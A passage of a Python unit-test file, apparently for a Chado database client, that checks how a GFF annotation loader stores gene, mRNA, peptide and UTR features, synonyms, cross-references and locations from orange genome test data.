assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
assert len(children) == 15, "mRNA relationships, single peptide"
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>gene located correctly"
def test_load_gff_pepregex(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], re_protein="foo\\1-bar", re_protein_capture="PAC:([0-9]+)", no_seq_compute=True)
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
assert pep_f.uniquename == "foo18136219-bar", "gff>pep loaded correctly"
def test_load_gff_pepregex2(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], re_protein="foo\\1-bar", no_seq_compute=True)
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
assert pep_f.uniquename == "fooPAC:18136219-bar", "gff>pep loaded correctly"
def test_load_gff_twice(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
# Adding twice the same gff should not change anything in the db
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
assert len(rna_f.featureloc_collection) == 1, "gff>pep located correctly"
assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
assert len(children) == 30, "mRNA relationships, single peptide" # relations to utr/cds/exons are duplicarted as they don't have an ID or Name attribute in gff => random uniquename in db
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>target loc ok"
def test_load_gff_landmarktype(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
# there's a contig loaded by fasta and a supercontig in gff
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
def test_load_gff_nolandmark(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Should create the landmark
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig", no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
@raises(Exception)
def test_load_gff_nolandmark_fail(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Should create the landmark
